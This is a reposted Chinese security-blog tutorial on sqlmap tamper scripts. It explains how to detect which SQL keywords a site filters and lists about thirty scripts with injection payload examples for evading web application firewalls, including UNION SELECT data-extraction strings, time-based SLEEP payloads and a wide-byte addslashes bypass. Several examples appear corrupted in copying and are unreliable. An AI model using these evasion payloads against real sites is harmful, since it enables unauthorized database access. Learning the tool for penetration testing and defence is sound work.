sqlmap脚本tamper使用

admin 2022年6月25日12:54:54安全文章评论53 views7652字阅读25分30秒阅读模式

很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。

sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。

当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。

所以有的时候我们会发现,注入成功了但是dump不出数据,很可能是select被过滤了等等原因。

如何判断使用哪个脚本

最简单的办法就是在url参数中手工带入关键词,判断是否被过滤。

如图:

直接加个单引号被过滤,说明注入时单引号是没法用的。

sqlmap脚本tamper使用


空格、等于号都没有过滤,成功报错。

sqlmap脚本tamper使用

select被过滤。

sqlmap脚本tamper使用

以此类推,当sqlmap注入出现问题时,比如不出数据,就要检查对应的关键词是否被过滤。

比如空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等。

下面对于sqlmap的tamper参数详细讲解。

使用方法

参考:sqlmap用户手册详解【实用版】:https://www.vuln.cn/2035

根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化。

sqlmap脚本tamper使用

sqlmap.py -u "http://www.target.com/test.php?id=12" --dbms mysql --tamper "space2commet,versionedmorekeywords.py"  -v 3 --dbs

脚本名:apostrophemask.py


作用:用utf8代替引号

Example: ( "1 AND '1'='1" ) '1  AND  %EF%BC%871%EF%BC%87=%EF%BC%871'


Tested against: all

脚本名:equaltolike.py


作用:like 代替等号

Example:
*   Input:  SELECT   FROM  users  WHERE  id=1

*    Output  SELECT   FROM  users  WHERE  id  LIKE  1


案例一: http://wooyun.org/bugs/wooyun-2010-087296

案例二: http://wooyun.org/bugs/wooyun-2010-074790

案例三:http://wooyun.org/bugs/wooyun-2010-072489

脚本名:space2dash.py


作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)

Example: ( '1 AND 9227=9227' )  '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'


Tested against: * MSSQL * SQLite

案例一:http://wooyun.org/bugs/wooyun-2010-062878

脚本名:greatest.py


作用:绕过过滤’>’ ,用GREATEST替换大于号。

Example: ( '1 AND A > B'  '1 AND GREATEST(A,B+1)=A'  Tested against: * MySQL 4, 5.0  and  5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0

脚本名:space2hash.py


作用:空格替换为#号 随机字符串 以及换行符

Example:
*   Input: 1  AND  9227=9227
*    Output : 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227


Requirement:

  • MySQL Tested against:

  • MySQL 4.0, 5.0

脚本名:apostrophenullencode.py


作用:绕过过滤双引号,替换字符和双引号。

Example: tamper( "1 AND '1'='1" ) '1  AND  %00%271%00%27=%00%271'


Tested against:

  • MySQL 4, 5.0 and 5.5

  • Oracle 10g

  • PostgreSQL 8.3, 8.4, 9.0

脚本名:halfversionedmorekeywords.py


作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

Example:
( "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa" ) "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"


Requirement:

  • MySQL < 5.1

Tested against:

  • MySQL 4.0.18, 5.0.22

脚本名:space2morehash.py


作用:空格替换为 #号 以及更多随机字符串 换行符

Example:
* Input: 1  AND  9227=9227
 Output : 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227


Requirement: * MySQL >= 5.1.13 Tested

against: * MySQL 5.1.41

案例一:91ri一篇文章

脚本名:appendnullbyte.py


作用:在有效负荷结束位置加载零字节字符编码

Example: ( '1 AND 1=1'  '1 AND 1=1%00'


Requirement:

  • Microsoft Access

脚本名:ifnull2ifisnull.py


作用:绕过对 IFNULL 过滤。替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

Example:
( 'IFNULL(1, 2)'  'IF(ISNULL(1),2,1)'


Requirement:

  • MySQL

  • SQLite (possibly)

  • SAP MaxDB (possibly)

Tested against:

  • MySQL 5.0 and 5.5

脚本名:space2mssqlblank.py(mssql)


作用:空格替换为其它空符号

Example: * Input: SELECT id FROM users * Output: SELECT%08id%02FROM%0Fusers

Requirement: * Microsoft SQL Server Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005

ASCII table:


案例一: wooyun.org/bugs/wooyun-2010-062878

脚本名:base64encode.py


作用:用base64编码替换 Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

案例一: http://wooyun.org/bugs/wooyun-2010-060071

案例二: http://wooyun.org/bugs/wooyun-2010-021062

案例三: http://wooyun.org/bugs/wooyun-2010-043229

脚本名:space2mssqlhash.py


作用:替换空格

Example: ( '1 AND 9227=9227'  '1%23%0AAND%23%0A9227=9227'  Requirement: * MSSQL * MySQL


脚本名:modsecurityversioned.py


作用:过滤空格,包含完整的查询版本注释

Example: ( '1 AND 2>1--'  '1 /*!30874AND 2>1*/--'


Requirement: * MySQL

Tested against:

  • MySQL 5.0

脚本名:space2mysqlblank.py


作用:空格替换其它空白符号(mysql)

Example:
* Input:  SELECT  id  FROM  users
 Output  SELECT %0Bid%0BFROM%A0users


Requirement:

  • MySQL

Tested against:

  • MySQL 5.1

案例一:wooyun.org/bugs/wooyun-2010-076735

脚本名:between.py


作用:用between替换大于号(>)

Example: ( '1 AND A > B--'  '1 AND A NOT BETWEEN 0 AND B--'


Tested against:

  • Microsoft SQL Server 2005

  • MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0

案例一:wooyun.org/bugs/wooyun-2010-068815

脚本名:space2mysqldash.py


作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

注:之前有个mssql的 这个是mysql的

Example: ( '1 AND 9227=9227'  '1--%0AAND--%0A9227=9227'


Requirement:

  • MySQL

  • MSSQL

脚本名:multiplespaces.py


作用:围绕SQL关键字添加多个空格

Example: ( '1 UNION SELECT foobar'  '1 UNION SELECT foobar'


Tested against: all

案例一: wooyun.org/bugs/wooyun-2010-072489

脚本名:space2plus.py


作用:用+替换空格

Example: ( 'SELECT id FROM users'  'SELECT+id+FROM+users'  Tested against:  all


脚本名:bluecoat.py


作用:代替空格字符后与一个有效的随机空白字符的SQL语句。然后替换=为like

Example: ( 'SELECT id FROM users where id = 1'  'SELECT%09id FROM users where id LIKE 1'


Tested against:

  • MySQL 5.1, SGOS

脚本名:nonrecursivereplacement.py


双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

Example: ( '1 UNION SELECT 2--'  '1 UNIOUNIONN SELESELECTCT 2--'  Tested against:  all


脚本名:space2randomblank.py


作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集

Example: ( 'SELECT id FROM users'  'SELECT%0Did%0DFROM%0Ausers'


Tested against: all

脚本名:sp_password.py


作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

Example: ( '1 AND 9227=9227-- '  '1 AND 9227=9227-- sp_password'  Requirement: * MSSQL


脚本名:chardoubleencode.py


作用: 双url编码(不处理以编码的)

Example:
* Input:  SELECT  FIELD  FROM %20TABLE
 Output : %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545


脚本名:unionalltounion.py


作用:替换UNION ALL SELECT UNION SELECT

Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

Requirement: all

脚本名:charencode.py


作用:url编码

Example:
*   Input:  SELECT  FIELD  FROM %20TABLE
*    Output : %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45


tested against:

  • Microsoft SQL Server 2005

  • MySQL 4, 5.0 and 5.5

  • Oracle 10g

  • PostgreSQL 8.3, 8.4, 9.0

脚本名:randomcase.py


作用:随机大小写 Example:

  • Input: INSERT

  • Output: InsERt

Tested against:

  • Microsoft SQL Server 2005

  • MySQL 4, 5.0 and 5.5

  • Oracle 10g

  • PostgreSQL 8.3, 8.4, 9.0

脚本名:unmagicquotes.py


作用:宽字符绕过 GPC addslashes

Example:
* Input: 1′  AND  1=1
 Output : 1%bf%27  AND  1=1–%20


脚本名:randomcomments.py


作用:用/**/分割sql关键字

Example:
 INSERT ’ becomes ‘ IN //S//ERT’


脚本名:charunicodeencode.py


作用:字符串 unicode 编码

Example:
* Input:  SELECT  FIELD%20FROM  TABLE
 Output : %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′


Requirement:

  • ASP

  • ASP.NET

Tested against:

  • Microsoft SQL Server 2000

  • Microsoft SQL Server 2005

  • MySQL 5.1.56

  • PostgreSQL 9.0.3

案例一: wooyun.org/bugs/wooyun-2010-074261

脚本名:securesphere.py


作用:追加特制的字符串

Example: ( '1 AND 1=1'  "1 AND 1=1 and '0having'='0having'"


Tested against: all

脚本名:versionedmorekeywords.py


作用:注释绕过

Example:
* Input: 1  UNION  ALL  SELECT  NULL  NULL , CONCAT( CHAR (58,122,114,115,58),IFNULL( CAST ( CURRENT_USER ()  AS  CHAR ), CHAR (32)), CHAR (58,115,114,121,58))#
 Output : 1/*! UNION **! ALL **! SELECT **! NULL */,/*! NULL */,/*!CONCAT*/(/*! CHAR */(58,122,114,115,58),/*!IFNULL*/( CAST (/*! CURRENT_USER */()/*! AS **! CHAR */),/*! CHAR */(32)),/*! CHAR */(58,115,114,121,58))#


Requirement:

  • MySQL >= 5.1.13

脚本名:space2comment.py


作用:Replaces space character (‘ ‘) with comments ‘/**/’

Example:
* Input:  SELECT  id  FROM  users
 Output  SELECT //id// FROM /**/users


Tested against:

  • Microsoft SQL Server 2005

  • MySQL 4, 5.0 and 5.5

  • Oracle 10g

  • PostgreSQL 8.3, 8.4, 9.0

案例一:wooyun.org/bugs/wooyun-2010-046496

脚本名:halfversionedmorekeywords.py


作用:关键字前加注释

Example:
* Input: value’  UNION  ALL  SELECT  CONCAT( CHAR (58,107,112,113,58),IFNULL( CAST ( CURRENT_USER ()  AS  CHAR ), CHAR (32)), CHAR (58,97,110,121,58)),  NULL  NULL  AND ‘QDWa’= 'QDWa
* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’=' QDWa


Requirement:

  • MySQL < 5.1

Tested against:

  • MySQL 4.0.18, 5.0.22

转自:http://blog.csdn.net/qq_29277155/article/details/52266478


sqlmap脚本tamper使用

好文推荐

sqlmap脚本tamper使用

工具|红队快速批量打点

实战 | App优惠劵无限领取漏洞挖掘记录

利用 EHole 进行红队快速批量打点

神兵利器 - presshell

渗透测试-Ngrok内网映射与穿透

分享 | 几种实战成功过的webshell免杀方式

推荐一款自动向hackerone发送漏洞报告的扫描器

李姐姐开源DNSLog工具eyes.sh


欢迎关注 系统安全运维

原文始发于微信公众号(系统安全运维):sqlmap脚本tamper使用

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月25日12:54:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  sqlmap脚本tamper使用 http://cn-sec.com/archives/1142989.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: